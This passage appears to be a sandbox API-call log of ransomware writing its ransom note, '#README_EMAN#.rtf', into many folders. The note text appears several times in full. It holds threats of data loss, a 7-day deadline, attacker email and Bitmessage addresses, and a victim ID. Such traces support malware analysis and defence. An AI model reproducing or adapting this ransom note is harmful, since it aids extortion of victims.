thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.079] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.080] CloseHandle (hObject=0x294) returned 1 [0285.080] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\#readme_eman#.rtf")) returned 0xffffffff [0285.080] GetLastError () returned 0x2 [0285.080] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.080] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 